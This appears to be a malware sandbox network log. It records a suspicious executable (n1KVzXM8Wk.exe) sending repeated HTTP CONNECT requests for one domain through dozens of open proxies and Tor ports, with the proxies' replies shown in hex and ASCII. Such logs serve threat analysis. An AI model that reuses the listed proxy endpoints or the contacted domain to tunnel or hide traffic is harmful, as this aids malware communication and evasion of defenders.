                                                                                                      Feb 23, 2024 09:45:25.059475899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178703070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178818941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178828001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1146192.168.2.453000198.12.253.117270556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.067468882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1147192.168.2.45320920.210.113.32806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.076776028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.335860014 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1148192.168.2.453247132.148.245.247109586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.089379072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1149192.168.2.452999144.24.77.90555556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.097297907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1150192.168.2.45318458.75.126.23541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.097304106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1151192.168.2.453262162.243.102.20797646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.098006964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1152192.168.2.452178103.139.188.4170776812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.099611044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.455430984 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1153192.168.2.453161114.132.202.7880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.099613905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.886687994 CET84INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Transfer-Encoding: chunked


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1154192.168.2.4531908.217.187.52240026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.100370884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1155192.168.2.453103199.229.254.12941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.128288984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1156192.168.2.45302869.163.43.12480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.138925076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178787947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.415210962 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1157192.168.2.452422161.97.163.5240856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.147980928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178765059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.178817034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.178843021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1158192.168.2.453216171.248.213.12110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.148372889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1159192.168.2.452172183.78.143.137295546812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.155051947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219122887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334517956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.334806919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.058614969 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1160192.168.2.45326066.78.54.93200006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.155051947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.314980030 CET1286INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 3584
                                                                                                      X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                                                                                      Vary: Accept-Language
                                                                                                      Content-Language: en
                                                                                                      Proxy-Authenticate: Basic realm="Private"
                                                                                                      X-Cache: MISS from localhost
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 43 61 63 68 65 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Cache Access Denied</title><style type="text/css">... /* * Copyright (C) 1996-2019 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efe


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1161192.168.2.45297770.166.167.55577456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.185959101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1162192.168.2.45330993.190.24.1194436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.199084044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1163192.168.2.453242119.39.68.7923236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.230967999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1164192.168.2.45237634.81.72.31806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.230989933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333538055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.334857941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.334868908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1165192.168.2.453268141.94.174.6350726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.231496096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1166192.168.2.453269144.76.96.18055666812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.236120939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.410736084 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1167192.168.2.45331093.190.24.1194436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.247122049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1168192.168.2.4532518.213.129.2030806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.248991966 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:27.551229000 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1169192.168.2.45324160.205.132.71806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.249365091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.605516911 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>
                                                                                                      Feb 23, 2024 09:45:25.805814981 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1170192.168.2.45317558.253.210.12288886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.249454021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1171192.168.2.453286172.93.213.177806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.249723911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.225176096 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.22.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1172192.168.2.45327277.242.235.3541536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.260575056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1173192.168.2.45332593.190.24.1194436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.266057014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
